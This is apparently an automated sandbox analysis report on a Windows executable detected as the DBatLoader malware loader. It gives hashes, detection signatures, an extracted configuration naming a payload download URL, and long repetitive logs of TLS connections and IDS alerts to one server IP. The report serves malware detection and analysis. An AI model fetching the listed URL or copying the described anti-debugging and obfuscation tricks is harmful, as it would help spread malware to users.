Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UTstKgkJNY.exe

Overview

General Information

Sample name:UTstKgkJNY.exe
renamed because original name is a hash value
Original sample name:7e6af615a074f41ea63ef69a047e8f6d.exe
Analysis ID:1590521
MD5:7e6af615a074f41ea63ef69a047e8f6d
SHA1:a466ec15884ee1ab19dd0bed7327ffcf1db4a6f2
SHA256:939c125accb6e2f939bc239c45d3ead938a0c0bcd63d77fbde11ed96ed1a1c76
Tags:exeuser-abuse_ch
Infos:

Detection

DBatLoader
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • UTstKgkJNY.exe (PID: 7736 cmdline: "C:\Users\user\Desktop\UTstKgkJNY.exe" MD5: 7E6AF615A074F41EA63EF69A047E8F6D)
  • cleanup
{"Download Url": ["https://amazonenviro.com/245_Tzzlqsjvkee"]}
SourceRuleDescriptionAuthorStrings
00000001.00000002.2528020795.000000007FBB0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
    00000001.00000002.2512810785.00000000021E6000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
      SourceRuleDescriptionAuthorStrings
      1.2.UTstKgkJNY.exe.21e65a8.1.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
        1.2.UTstKgkJNY.exe.2860000.2.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
          1.2.UTstKgkJNY.exe.21e65a8.1.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-14T08:25:03.113199+010020283713Unknown Traffic192.168.2.1049706166.62.27.188443TCP
            2025-01-14T08:25:04.606069+010020283713Unknown Traffic192.168.2.1049708166.62.27.188443TCP
            2025-01-14T08:25:06.322079+010020283713Unknown Traffic192.168.2.1049710166.62.27.188443TCP
            2025-01-14T08:25:07.972097+010020283713Unknown Traffic192.168.2.1049718166.62.27.188443TCP
            2025-01-14T08:25:09.616455+010020283713Unknown Traffic192.168.2.1049728166.62.27.188443TCP
            2025-01-14T08:25:11.252572+010020283713Unknown Traffic192.168.2.1049738166.62.27.188443TCP
            2025-01-14T08:25:13.028589+010020283713Unknown Traffic192.168.2.1049750166.62.27.188443TCP
            2025-01-14T08:25:14.685126+010020283713Unknown Traffic192.168.2.1049762166.62.27.188443TCP
            2025-01-14T08:25:16.337260+010020283713Unknown Traffic192.168.2.1049773166.62.27.188443TCP
            2025-01-14T08:25:17.972623+010020283713Unknown Traffic192.168.2.1049786166.62.27.188443TCP
            2025-01-14T08:25:19.592300+010020283713Unknown Traffic192.168.2.1049799166.62.27.188443TCP
            2025-01-14T08:25:21.221630+010020283713Unknown Traffic192.168.2.1049809166.62.27.188443TCP
            2025-01-14T08:25:22.840018+010020283713Unknown Traffic192.168.2.1049822166.62.27.188443TCP
            2025-01-14T08:25:24.591649+010020283713Unknown Traffic192.168.2.1049835166.62.27.188443TCP
            2025-01-14T08:25:26.232730+010020283713Unknown Traffic192.168.2.1049847166.62.27.188443TCP
            2025-01-14T08:25:27.874388+010020283713Unknown Traffic192.168.2.1049860166.62.27.188443TCP
            2025-01-14T08:25:29.493433+010020283713Unknown Traffic192.168.2.1049871166.62.27.188443TCP
            2025-01-14T08:25:31.110157+010020283713Unknown Traffic192.168.2.1049884166.62.27.188443TCP
            2025-01-14T08:25:32.713974+010020283713Unknown Traffic192.168.2.1049895166.62.27.188443TCP
            2025-01-14T08:25:34.389067+010020283713Unknown Traffic192.168.2.1049906166.62.27.188443TCP
            2025-01-14T08:25:36.002641+010020283713Unknown Traffic192.168.2.1049919166.62.27.188443TCP
            2025-01-14T08:25:37.619233+010020283713Unknown Traffic192.168.2.1049932166.62.27.188443TCP
            2025-01-14T08:25:39.366946+010020283713Unknown Traffic192.168.2.1049944166.62.27.188443TCP
            2025-01-14T08:25:40.989375+010020283713Unknown Traffic192.168.2.1049958166.62.27.188443TCP
            2025-01-14T08:25:42.609774+010020283713Unknown Traffic192.168.2.1049967166.62.27.188443TCP
            2025-01-14T08:25:44.255309+010020283713Unknown Traffic192.168.2.1049980166.62.27.188443TCP
            2025-01-14T08:25:45.878917+010020283713Unknown Traffic192.168.2.1049991166.62.27.188443TCP
            2025-01-14T08:25:47.475932+010020283713Unknown Traffic192.168.2.1050004166.62.27.188443TCP
            2025-01-14T08:25:49.094571+010020283713Unknown Traffic192.168.2.1050018166.62.27.188443TCP
            2025-01-14T08:25:50.705630+010020283713Unknown Traffic192.168.2.1050028166.62.27.188443TCP
            2025-01-14T08:25:52.339628+010020283713Unknown Traffic192.168.2.1050034166.62.27.188443TCP
            2025-01-14T08:25:53.961969+010020283713Unknown Traffic192.168.2.1050036166.62.27.188443TCP
            2025-01-14T08:25:55.588546+010020283713Unknown Traffic192.168.2.1050039166.62.27.188443TCP
            2025-01-14T08:25:57.219285+010020283713Unknown Traffic192.168.2.1050041166.62.27.188443TCP
            2025-01-14T08:25:58.821989+010020283713Unknown Traffic192.168.2.1050043166.62.27.188443TCP
            2025-01-14T08:26:00.617487+010020283713Unknown Traffic192.168.2.1050045166.62.27.188443TCP
            2025-01-14T08:26:02.227696+010020283713Unknown Traffic192.168.2.1050047166.62.27.188443TCP
            2025-01-14T08:26:03.842523+010020283713Unknown Traffic192.168.2.1050049166.62.27.188443TCP
            2025-01-14T08:26:05.430865+010020283713Unknown Traffic192.168.2.1050051166.62.27.188443TCP
            2025-01-14T08:26:07.041444+010020283713Unknown Traffic192.168.2.1050053166.62.27.188443TCP
            2025-01-14T08:26:08.626685+010020283713Unknown Traffic192.168.2.1050055166.62.27.188443TCP
            2025-01-14T08:26:10.271193+010020283713Unknown Traffic192.168.2.1050057166.62.27.188443TCP
            2025-01-14T08:26:11.881431+010020283713Unknown Traffic192.168.2.1050059166.62.27.188443TCP
            2025-01-14T08:26:13.495370+010020283713Unknown Traffic192.168.2.1050061166.62.27.188443TCP
            2025-01-14T08:26:15.086717+010020283713Unknown Traffic192.168.2.1050063166.62.27.188443TCP
            2025-01-14T08:26:16.712396+010020283713Unknown Traffic192.168.2.1050065166.62.27.188443TCP
            2025-01-14T08:26:18.338151+010020283713Unknown Traffic192.168.2.1050067166.62.27.188443TCP
            2025-01-14T08:26:19.945572+010020283713Unknown Traffic192.168.2.1050069166.62.27.188443TCP
            2025-01-14T08:26:21.549741+010020283713Unknown Traffic192.168.2.1050071166.62.27.188443TCP
            2025-01-14T08:26:23.156474+010020283713Unknown Traffic192.168.2.1050073166.62.27.188443TCP
            2025-01-14T08:26:24.799910+010020283713Unknown Traffic192.168.2.1050075166.62.27.188443TCP
            2025-01-14T08:26:26.408648+010020283713Unknown Traffic192.168.2.1050077166.62.27.188443TCP
            2025-01-14T08:26:28.002623+010020283713Unknown Traffic192.168.2.1050079166.62.27.188443TCP
            2025-01-14T08:26:29.636140+010020283713Unknown Traffic192.168.2.1050081166.62.27.188443TCP
            2025-01-14T08:26:31.254306+010020283713Unknown Traffic192.168.2.1050083166.62.27.188443TCP
            2025-01-14T08:26:32.854019+010020283713Unknown Traffic192.168.2.1050085166.62.27.188443TCP
            2025-01-14T08:26:34.447966+010020283713Unknown Traffic192.168.2.1050087166.62.27.188443TCP
            2025-01-14T08:26:36.050441+010020283713Unknown Traffic192.168.2.1050089166.62.27.188443TCP
            2025-01-14T08:26:37.643543+010020283713Unknown Traffic192.168.2.1050091166.62.27.188443TCP
            2025-01-14T08:26:39.237291+010020283713Unknown Traffic192.168.2.1050093166.62.27.188443TCP
            2025-01-14T08:26:40.864699+010020283713Unknown Traffic192.168.2.1050095166.62.27.188443TCP
            2025-01-14T08:26:42.459649+010020283713Unknown Traffic192.168.2.1050097166.62.27.188443TCP
            2025-01-14T08:26:44.067064+010020283713Unknown Traffic192.168.2.1050099166.62.27.188443TCP
            2025-01-14T08:26:45.681662+010020283713Unknown Traffic192.168.2.1050101166.62.27.188443TCP
            2025-01-14T08:26:47.273324+010020283713Unknown Traffic192.168.2.1050103166.62.27.188443TCP
            2025-01-14T08:26:48.876203+010020283713Unknown Traffic192.168.2.1050105166.62.27.188443TCP
            2025-01-14T08:26:50.475361+010020283713Unknown Traffic192.168.2.1050107166.62.27.188443TCP
            2025-01-14T08:26:52.082709+010020283713Unknown Traffic192.168.2.1050109166.62.27.188443TCP
            2025-01-14T08:26:54.095013+010020283713Unknown Traffic192.168.2.1050111166.62.27.188443TCP
            2025-01-14T08:26:55.710527+010020283713Unknown Traffic192.168.2.1050113166.62.27.188443TCP
            2025-01-14T08:26:57.333061+010020283713Unknown Traffic192.168.2.1050115166.62.27.188443TCP
            2025-01-14T08:26:58.943766+010020283713Unknown Traffic192.168.2.1050117166.62.27.188443TCP
            2025-01-14T08:27:00.582790+010020283713Unknown Traffic192.168.2.1050119166.62.27.188443TCP
            2025-01-14T08:27:02.247995+010020283713Unknown Traffic192.168.2.1050121166.62.27.188443TCP
            2025-01-14T08:27:03.876625+010020283713Unknown Traffic192.168.2.1050123166.62.27.188443TCP
            2025-01-14T08:27:05.468383+010020283713Unknown Traffic192.168.2.1050125166.62.27.188443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: UTstKgkJNY.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://amazonenviro.com/245_Tzzlqsjvkee"]}
            Source: UTstKgkJNY.exeReversingLabs: Detection: 68%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: UTstKgkJNY.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49762 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49773 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49786 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49799 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49809 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49822 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49835 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49847 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49860 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49871 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49884 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49895 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49906 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49919 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49932 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49944 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49958 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49967 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49980 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49991 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50004 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50018 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50028 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50034 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50036 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50039 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50041 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50043 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50045 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50047 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50049 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50051 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50053 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50055 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50057 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50059 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50061 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50063 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50065 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50067 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50069 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50071 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50073 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50075 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50077 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50079 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50081 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50083 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50085 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50087 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50089 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50091 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50091 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50093 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50095 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50097 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50099 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50101 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50103 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50105 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50107 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50109 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50111 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50113 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50115 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50117 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50119 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50121 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50123 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50125 version: TLS 1.2
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_028658B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,1_2_028658B4

            Networking

            barindex
            Source: Malware configuration extractorURLs: https://amazonenviro.com/245_Tzzlqsjvkee
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0287E72C InternetCheckConnectionA,1_2_0287E72C
            Source: Joe Sandbox ViewIP Address: 166.62.27.188 166.62.27.188
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49706 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49708 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49710 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49718 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49728 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49750 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49738 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49762 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49773 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49799 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49809 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49786 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49822 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49835 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49847 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49860 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49871 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49884 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49895 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49919 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49906 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49932 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49967 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49991 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50004 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50018 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49958 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49944 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50028 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50034 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50036 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50039 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50051 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49980 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50055 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50057 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50049 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50061 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50043 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50047 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50071 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50059 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50087 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50091 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50095 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50053 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50075 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50105 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50089 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50093 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50045 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50085 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50101 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50125 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50119 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50103 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50073 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50113 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50067 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50107 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50077 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50041 -> 166.62.27.188:443
